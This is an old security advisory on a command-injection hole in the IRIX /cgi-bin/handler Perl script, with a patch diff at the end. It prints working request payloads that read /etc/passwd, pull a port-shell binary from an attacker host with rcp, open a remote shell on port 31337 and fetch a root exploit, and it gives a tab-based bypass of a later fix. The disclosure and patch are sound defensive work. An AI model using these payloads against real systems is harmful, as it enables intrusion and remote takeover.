COMMAND

    /cgi-bin/handler

SYSTEMS AFFECTED

    IRIX 5.3, 6.2, 6.3, 6.4

PROBLEM

    It is a  small perl program  that allows (in  theory) to read  and
    download files  under the  system's root  directory.   In fact  it
    allows you to execute any command remotely on the target machine.

    Here's  how  it   works.  "handler"  reads   PATH_INFO  from   the
    environment  and  then  concatenates  it  with  a  default   "root
    directory" (let's say /var/www/htdocs).  It then runs a  "validity
    check" on the result.  But it only checks  for ".." not for  other
    potential offensive  special chars.   It then  uses "open  (INPUT,
    $doc)" where $doc is the  result of the concatenation.   If you're
    familiar with PERL  you know that  if a '|'  character follows the
    filename, perl will treat that  filename as a command. It  runs it
    and  gives  you  STDOUT.   The  way  to exploit this "feature" for
    cgi-bin/handler is:

        telnet target.machine.com 80
        GET /cgi-bin/handler/whatever;cat       /etc/passwd|    ?data=Download
        HTTP/1.0

    or you may try:

        telnet target.machine.com 80
        GET /cgi-bin/handler/blah;/usr/sbin/xwsh  -display        yourhost.com|?data=Download

    Also:

        enemy% telnet victim 80
        Trying 1.2.3.4...
        Connected to victim.
        Escape character is '^]'.
        GET /cgi-bin/handler/;/usr/sbin/xwsh  -display  enemy:0  -e        /bin/csh|?data=Download
        UX:sh (sh): ERROR: Connection closed by foreign host.
        enemy%

    Evil may try this:

        enemy% whoami
        evil_cracker
        enemy% echo + + > .rhosts
        enemy% nc victim.com 80
        GET /cgi-bin/handler/;/usr/bsd/rcp      evil_cracker@enemy.com:portshell        /tmp|?data=Download
        enemy% nc victim.com 80
        GET /cgi-bin/handler/;/tmp/portshell    31337|?data=Download
        enemy% nc victim.com 31337
        % whoami
        nobody
        % rcp evil_cracker@enemy.com:irix_root_bug_of_the_week.sh \
        ./irbotw.sh ; ./irbotw.sh
        #
        [... or whatever ...]

    Note that you have to use a TAB character after cat, not a   space
    because the  shell will  accept it  as a  separator and  it  won't
    confuse  the  HTTP  server.  You  can't  use the %xx format  (%20)
    because the  script doesn't  do any  parsing (So  you will not  be
    able to give command that contain spaces).

    Of course,  you can  use any  other command  instead of "cat"  but
    remember NOT to use spaces, just tabs.

    The server  will display  an error  saying that  it couldn't  open
    "useless_shit"  but  it  will  continue  anyway  and execute  your
    command.   Credit goes to Razvan Dragomirescu.

    This was tested on  two Indy machines with  IRIX 6.2 and one  5.3.
    For IRIX 6.3, they  changed a code. They  added a new line  to the
    script:

            $doc=~s/\|*$// (in plain  English, this means  "remove any
            number  of  '|'s  at  end-of-string").  But guess what. It
            works just as fine if you put another TAB character  after
            the "pipe" (so  that the "pipe"  is not at  end-of-string,
            the TAB is).

SOLUTION

    Nuke that handler.  I'm not sure you need that really.  For  those
    of you who want to patch it somehow, solution by Wolfram Schneider
    follows. You may patch them (wrap has same problem):

    *** handler.orig        Wed Jul 23 20:49:26 1997
    --- handler     Wed Jul 23 20:55:25 1997
    ***************
    *** 26,31 ****
    --- 26,32 ----
      $pathRoot = $_[$#_] ;
      $doc      = $ROOT.$PATH ;

    + $_ = $PATH;
      &ErrBadPath unless &ValidPath ; # Check for server spoofing

      #__________________________________________________________
    ***************
    *** 108,113 ****
    --- 109,117 ----

      sub ValidPath
      {
    + # suggested by drazvan@kappa.ro
    +     if (/[|;]/)       { return '' };
    +
          return 1 unless /\.\./ ;

          return '' if /^\.\./ ;
    ***************
    *** 117,120 ****
    --- 121,136 ----
          return 1 ;
      }

    + sub ErrBadPath
    + {
    +       print <<ENDOFTEXT ;
    + Content-type: text/html

    + <HEAD><TITLE>404 Not Found</TITLE></HEAD>
    + <BODY><H1>404 Not Found</H1>
    + The requested URL $PATH was not found on this server.<P>
    + </BODY>
    + ENDOFTEXT
    +
    +       die ;
    + }